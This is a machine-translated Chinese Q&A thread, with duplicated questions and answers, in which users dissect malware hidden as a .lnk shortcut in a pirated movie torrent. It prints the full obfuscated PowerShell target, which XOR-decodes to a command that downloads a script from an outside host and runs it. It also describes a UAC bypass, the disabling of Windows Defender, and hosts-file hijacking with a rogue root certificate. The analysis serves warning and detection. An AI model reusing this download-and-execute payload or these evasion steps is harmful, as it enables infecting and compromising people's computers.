第 1 阶段（.lnk 文件）

Question 1

这绝对是恶意软件！

基本上这是一个多阶段的恶意软件。到目前为止，我已经经历了：

第 1 阶段（.lnk 文件）

下载并执行 powershell 代码http://zvd.us/1

第 2 阶段

下载的 powershell 代码包含以下内容的逐字副本：https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1，这似乎是某种 UAC 绕过。然后它会下载并（以管理员身份）执行批处理文件。

第 3 阶段

该批处理文件首先尝试禁用所有 Windows Defender 组件（驱动程序、计划任务、自动运行条目），并为此添加组策略。然后，它会下载并执行 2 个文件。我将发布这些文件的病毒总链接。

第一个似乎是已知的恶意软件。而第二个是 NSIS 安装程序，我还没有完全分析它。它似乎hosts用自己的文件替换了系统文件，将许多域重定向到 80.241.222.137，并安装了一个根证书。

Answer

这绝对是恶意软件！

基本上这是一个多阶段的恶意软件。到目前为止，我已经经历了：

第 1 阶段（.lnk 文件）

下载并执行 powershell 代码http://zvd.us/1

第 2 阶段

下载的 powershell 代码包含以下内容的逐字副本：https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1，这似乎是某种 UAC 绕过。然后它会下载并（以管理员身份）执行批处理文件。

第 3 阶段

该批处理文件首先尝试禁用所有 Windows Defender 组件（驱动程序、计划任务、自动运行条目），并为此添加组策略。然后，它会下载并执行 2 个文件。我将发布这些文件的病毒总链接。

第一个似乎是已知的恶意软件。而第二个是 NSIS 安装程序，我还没有完全分析它。它似乎hosts用自己的文件替换了系统文件，将许多域重定向到 80.241.222.137，并安装了一个根证书。

Question 2

@zoredache 似乎知道要点。它只是在窗口中执行命令，并在旁路模式下加载执行策略（不需要代码签名）。

您可以使用以下内容进行测试（我在末尾添加了 3 个括号，但我觉得缺少了一些东西。）

$value = [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82)))
Write-Host $value
2695777870303302222112917319113928491937430109717774918316112917416105919212582

不知道那个代码是什么，但我认为这个想法是将 DEC ASCII 字符代码连接成一个字符串。据我所知，你的“Hallo World！”似乎偏离了主题。首先，你得到的字符串中有很多字符。

http://www.asciitable.com/建议如下：

SUB _ MNF RS ETX RS SYN SYN p [ I DC3 q \ T [ ] J RS m GMJ [ S DLE p [ J DLE i Z \ } R

Answer

@zoredache 似乎知道要点。它只是在窗口中执行命令，并在旁路模式下加载执行策略（不需要代码签名）。

您可以使用以下内容进行测试（我在末尾添加了 3 个括号，但我觉得缺少了一些东西。）

$value = [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82)))
Write-Host $value
2695777870303302222112917319113928491937430109717774918316112917416105919212582

不知道那个代码是什么，但我认为这个想法是将 DEC ASCII 字符代码连接成一个字符串。据我所知，你的“Hallo World！”似乎偏离了主题。首先，你得到的字符串中有很多字符。

http://www.asciitable.com/建议如下：

SUB _ MNF RS ETX RS SYN SYN p [ I DC3 q \ T [ ] J RS m GMJ [ S DLE p [ J DLE i Z \ } R

Question 3

我对此有了进一步的了解，因为我的搭档的电脑上也发生了同样的事情。LNK 文件的目标实际上比属性窗口中的框要长得多。链接分析器我检索到了完整的目标：

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82 ,87, 91 , 80 ,74 ,23 , 23,16,122,81 ,73,80 ,82 , 81 , 95, 90 , 109, 74 ,76,87,80 , 89,22, 25 , 86 , 74, 74 ,78, 4, 17 ,17 , 68,72 , 92 ,16 ,75,77 ,17 ,15 ,25,23 ,5 , 119, 123 ,102 ,30, 26, 95, 77 ,78 , 70 )|fOReAch-ObjECT {[cHAr] ($_ -bXOr'0x3E')}) ) | .( $EnV:coMsPeC[4,24,25]-jOiN'')

在上面的命令中，直到|.创建一个数字列表，对每个数字进行某种二进制异或运算，然后将结果合并为一个字符串。我相信这是一种混淆代码的方法。结果是：

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

然后它被输送到( $EnV:coMsPeC[4,24,25]-jOiN'')。

COMSPEC 是命令行解释器，但我不知道该[4,24,25]-jOiN部分应该做什么。在最好的情况下，它只是下载函数中的 URL，DownloadString仅此而已；在最坏的情况下，它会下载某些内容然后执行。我没有足够的勇气去跟踪 URL。

总而言之，我想说这看起来很像恶意软件，但如果有 powershell 经验的人可以发表评论就更好了。

Answer

我对此有了进一步的了解，因为我的搭档的电脑上也发生了同样的事情。LNK 文件的目标实际上比属性窗口中的框要长得多。链接分析器我检索到了完整的目标：

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82 ,87, 91 , 80 ,74 ,23 , 23,16,122,81 ,73,80 ,82 , 81 , 95, 90 , 109, 74 ,76,87,80 , 89,22, 25 , 86 , 74, 74 ,78, 4, 17 ,17 , 68,72 , 92 ,16 ,75,77 ,17 ,15 ,25,23 ,5 , 119, 123 ,102 ,30, 26, 95, 77 ,78 , 70 )|fOReAch-ObjECT {[cHAr] ($_ -bXOr'0x3E')}) ) | .( $EnV:coMsPeC[4,24,25]-jOiN'')

在上面的命令中，直到|.创建一个数字列表，对每个数字进行某种二进制异或运算，然后将结果合并为一个字符串。我相信这是一种混淆代码的方法。结果是：

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

然后它被输送到( $EnV:coMsPeC[4,24,25]-jOiN'')。

COMSPEC 是命令行解释器，但我不知道该[4,24,25]-jOiN部分应该做什么。在最好的情况下，它只是下载函数中的 URL，DownloadString仅此而已；在最坏的情况下，它会下载某些内容然后执行。我没有足够的勇气去跟踪 URL。

总而言之，我想说这看起来很像恶意软件，但如果有 powershell 经验的人可以发表评论就更好了。

Question 4

恶意软件。隐藏在

https://thepiratebay.rocks/torrent/26213608/Bohemian_Rhapsody_2018.720p.DVDRip.x264.DTS-1XBET

通过谷歌找到这个帖子。这将是病毒/恶意软件等，很可能会破坏您的 PC。它附加在 PirateBay 上的各种大文件上，并隐藏了将在您的 PC 上安装垃圾的代码。不要运行它。立即删除。这是在 PirateBay 的“Bohemian Rhapsody 2018.avi”电影中，但 700mg 文件只是空间，它实际上是垃圾的符号链接/快捷方式。检查属性选项卡。

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82

Answer

恶意软件。隐藏在

https://thepiratebay.rocks/torrent/26213608/Bohemian_Rhapsody_2018.720p.DVDRip.x264.DTS-1XBET

通过谷歌找到这个帖子。这将是病毒/恶意软件等，很可能会破坏您的 PC。它附加在 PirateBay 上的各种大文件上，并隐藏了将在您的 PC 上安装垃圾的代码。不要运行它。立即删除。这是在 PirateBay 的“Bohemian Rhapsody 2018.avi”电影中，但 700mg 文件只是空间，它实际上是垃圾的符号链接/快捷方式。检查属性选项卡。

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82

第 1 阶段（.lnk 文件）

答案1

第 1 阶段（.lnk 文件）

第 2 阶段

第 3 阶段

答案2

答案3

答案4

相关内容